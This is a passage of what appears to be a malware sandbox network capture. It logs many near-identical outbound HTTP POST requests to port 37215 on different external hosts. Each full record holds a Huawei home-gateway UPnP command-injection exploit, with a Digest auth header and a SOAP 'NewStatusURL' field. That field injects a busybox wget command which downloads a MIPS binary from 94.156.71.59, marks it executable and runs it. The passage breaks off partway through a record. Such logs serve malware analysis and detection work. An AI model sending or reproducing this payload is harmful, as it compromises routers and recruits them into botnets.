                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            654192.168.2.1336608156.212.201.14737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.503623009 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            655192.168.2.1355388197.86.241.11337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.504276991 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            656192.168.2.133486041.245.146.7637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.504959106 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            657192.168.2.134227641.70.83.4237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.505631924 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            658192.168.2.1332782156.211.133.21637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.506272078 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            659192.168.2.133886041.53.52.23837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.506944895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            660192.168.2.1360618156.211.140.8337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.507632017 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            661192.168.2.1358330197.240.30.8537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.508358955 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            662192.168.2.1343224156.103.216.15837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.509056091 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            663192.168.2.1349560197.146.88.25337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:02.509844065 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
